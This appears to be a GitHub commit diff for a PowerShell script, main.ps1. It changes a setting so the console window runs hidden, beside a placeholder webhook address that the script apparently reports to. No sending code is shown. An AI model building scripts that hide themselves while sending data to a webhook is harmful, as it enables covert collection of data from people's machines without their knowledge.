Update main.ps1

This commit is contained in:
egieb
2024-04-03 19:16:32 +00:00
committed by GitHub
parent 1f2e66a35b
commit 91f1087b0c

View File

@@ -18,7 +18,7 @@ if ($dc.Length -eq 0){
$dc = "YOUR_WEBHOOK_HERE"
}
$hideWindow = 0 # 1 = Hidden
$hideWindow = 1 # 1 = Hidden
[Console]::BackgroundColor = "Black"
[Console]::SetWindowSize(60, 20)